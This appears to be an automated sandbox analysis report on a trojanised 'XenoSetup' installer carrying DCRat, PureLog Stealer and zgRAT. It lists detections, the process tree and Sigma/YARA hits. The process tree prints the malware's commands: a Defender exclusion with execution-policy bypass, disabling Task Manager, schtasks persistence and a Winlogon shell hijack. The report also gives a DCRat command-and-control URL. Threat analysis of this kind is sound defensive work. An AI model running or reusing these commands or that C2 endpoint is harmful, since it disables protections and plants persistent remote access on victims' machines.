Edit tour

Windows Analysis Report
XenoSetup(2).exe.bin.exe

Overview

General Information

Sample name:	XenoSetup(2).exe.bin.exe
Analysis ID:	1590013
MD5:	5aa236eabe65a1e444f1eb31fb330eba
SHA1:	b6a8d5362991511526ea5a2b86ad70f05e70652c
SHA256:	3d79293d371d3393d83f0d6205c35263baa3618a6f3ccba4fcefbee999d4a714
Tags:	DCRatexeNyashTeamuser-MalHunter3
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Creates an autostart registry key pointing to binary in C:\Windows

Creates an undocumented autostart registry key

Creates autostart registry keys with suspicious names

Creates multiple autostart registry keys

Creates processes via WMI

Disable Task Manager(disabletaskmgr)

Disables the Windows task manager (taskmgr)

Drops executables to the windows directory (C:\Windows) and starts them

Infects executable files (exe, dll, sys, html)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Uses cmd line tools excessively to alter registry or file data

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Powershell Defender Exclusion

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Classification

Process Tree

System is w10x64

XenoSetup(2).exe.bin.exe (PID: 876 cmdline: "C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe" MD5: 5AA236EABE65A1E444F1EB31FB330EBA)

powershell.exe (PID: 6400 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

XenoSetup(1).exe (PID: 1476 cmdline: "C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe" MD5: BCF49847A74E554A807294D4F5ADFA62)

wscript.exe (PID: 3820 cmdline: "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 2104 cmdline: C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 5396 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

DriverbrokerCrtDhcp.exe (PID: 1864 cmdline: "C:\portBrokerDll/DriverbrokerCrtDhcp.exe" MD5: C9D8BCE0425ED81346B9A43F148D948B)

schtasks.exe (PID: 2528 cmdline: schtasks.exe /create /tn "NZdXlPbVdUubKXQN" /sc MINUTE /mo 8 /tr "'C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 340 cmdline: schtasks.exe /create /tn "NZdXlPbVdUubKXQ" /sc ONLOGON /tr "'C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5892 cmdline: schtasks.exe /create /tn "NZdXlPbVdUubKXQN" /sc MINUTE /mo 12 /tr "'C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

csc.exe (PID: 4896 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 3220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 2664 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4177.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCEACDD11852CD4DF0A8C4FA8867592994.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

csc.exe (PID: 1540 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xze5z45r\xze5z45r.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 6844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 2276 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES436B.tmp" "c:\Users\user\AppData\Local\Temp\CSCF5A66DC0AE3041F58A3C1CE4B9A61B98.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

csc.exe (PID: 1088 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 876 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES458E.tmp" "c:\Windows\System32\CSC3568A44F8D2D461ABD894E9C160B8C.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

schtasks.exe (PID: 6568 cmdline: schtasks.exe /create /tn "DriverbrokerCrtDhcpD" /sc MINUTE /mo 10 /tr "'C:\portBrokerDll\DriverbrokerCrtDhcp.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6944 cmdline: schtasks.exe /create /tn "DriverbrokerCrtDhcp" /sc ONLOGON /tr "'C:\portBrokerDll\DriverbrokerCrtDhcp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5004 cmdline: schtasks.exe /create /tn "DriverbrokerCrtDhcpD" /sc MINUTE /mo 13 /tr "'C:\portBrokerDll\DriverbrokerCrtDhcp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 5696 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8dcADkVv20.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 3352 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 3064 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

DriverbrokerCrtDhcp.exe (PID: 2528 cmdline: "C:\portBrokerDll\DriverbrokerCrtDhcp.exe" MD5: C9D8BCE0425ED81346B9A43F148D948B)

Xeno.exe (PID: 6532 cmdline: "C:\Users\user\AppData\Local\Temp\Xeno.exe" MD5: 056586E6A4D9B97C77FD606B2A63F604)

NZdXlPbVdUubKXQ.exe (PID: 1476 cmdline: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe MD5: C9D8BCE0425ED81346B9A43F148D948B)

XenoSetup(1).exe (PID: 4828 cmdline: "C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe" MD5: BCF49847A74E554A807294D4F5ADFA62)

wscript.exe (PID: 1776 cmdline: "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 4020 cmdline: C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7084 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

DriverbrokerCrtDhcp.exe (PID: 5692 cmdline: "C:\portBrokerDll/DriverbrokerCrtDhcp.exe" MD5: C9D8BCE0425ED81346B9A43F148D948B)

XenoSetup(1).exe (PID: 2012 cmdline: "C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe" MD5: BCF49847A74E554A807294D4F5ADFA62)

wscript.exe (PID: 2676 cmdline: "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 2996 cmdline: C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 4788 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

DriverbrokerCrtDhcp.exe (PID: 5376 cmdline: "C:\portBrokerDll/DriverbrokerCrtDhcp.exe" MD5: C9D8BCE0425ED81346B9A43F148D948B)

NZdXlPbVdUubKXQ.exe (PID: 3184 cmdline: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe MD5: C9D8BCE0425ED81346B9A43F148D948B)

DriverbrokerCrtDhcp.exe (PID: 4372 cmdline: C:\portBrokerDll\DriverbrokerCrtDhcp.exe MD5: C9D8BCE0425ED81346B9A43F148D948B)

DriverbrokerCrtDhcp.exe (PID: 6952 cmdline: C:\portBrokerDll\DriverbrokerCrtDhcp.exe MD5: C9D8BCE0425ED81346B9A43F148D948B)

NZdXlPbVdUubKXQ.exe (PID: 1912 cmdline: "C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe" MD5: C9D8BCE0425ED81346B9A43F148D948B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://804052cm.nyashkoon.ru/imagelineGeoTest", "MUTEX": "DCR_MUTEX-SbjZ9dzDfzVchxMwaR3O", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000F.00000002.2691486762.000000001BCC0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0000000F.00000002.2691486762.000000001BCC0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000F.00000002.2633412439.0000000013584000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000F.00000002.2633412439.0000000013BEA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: DriverbrokerCrtDhcp.exe PID: 1864	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: NZdXlPbVdUubKXQ.exe PID: 1476	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: DriverbrokerCrtDhcp.exe PID: 5692	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
15.2.DriverbrokerCrtDhcp.exe.1bcc0000.32.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
15.2.DriverbrokerCrtDhcp.exe.1bcc0000.32.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.DriverbrokerCrtDhcp.exe.1bcc0000.32.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
15.2.DriverbrokerCrtDhcp.exe.1bcc0000.32.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.DriverbrokerCrtDhcp.exe.13c238a0.24.raw.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
15.2.DriverbrokerCrtDhcp.exe.13beaed8.25.raw.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 1088, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe, ProcessId: 876, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XenoSetup(1)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe", ParentImage: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe, ParentProcessId: 876, ParentProcessName: XenoSetup(2).exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', ProcessId: 6400, ProcessName: powershell.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe", ParentImage: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe, ParentProcessId: 876, ParentProcessName: XenoSetup(2).exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', ProcessId: 6400, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe", ParentImage: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe, ParentProcessId: 876, ParentProcessName: XenoSetup(2).exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', ProcessId: 6400, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe", ParentImage: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe, ParentProcessId: 876, ParentProcessName: XenoSetup(2).exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', ProcessId: 6400, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe, ProcessId: 876, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XenoSetup(1)

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe", EventID: 13, EventType: SetValue, Image: C:\portBrokerDll\DriverbrokerCrtDhcp.exe, ProcessId: 1864, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\portBrokerDll/DriverbrokerCrtDhcp.exe", ParentImage: C:\portBrokerDll\DriverbrokerCrtDhcp.exe, ParentProcessId: 1864, ParentProcessName: DriverbrokerCrtDhcp.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline", ProcessId: 4896, ProcessName: csc.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe" , ParentImage: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe, ParentProcessId: 1476, ParentProcessName: XenoSetup(1).exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe" , ProcessId: 3820, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\portBrokerDll\DriverbrokerCrtDhcp.exe, ProcessId: 1864, TargetFilename: C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe", ParentImage: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe, ParentProcessId: 876, ParentProcessName: XenoSetup(2).exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe', ProcessId: 6400, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\portBrokerDll/DriverbrokerCrtDhcp.exe", ParentImage: C:\portBrokerDll\DriverbrokerCrtDhcp.exe, ParentProcessId: 1864, ParentProcessName: DriverbrokerCrtDhcp.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline", ProcessId: 4896, ProcessName: csc.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: XenoSetup(2).exe.bin.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://804052cm.nyashkoon.ru/imagelineGeoTest.php	Avira URL Cloud: Label: malware
Source: http://804052cm.nyashkoon.ru	Avira URL Cloud: Label: malware
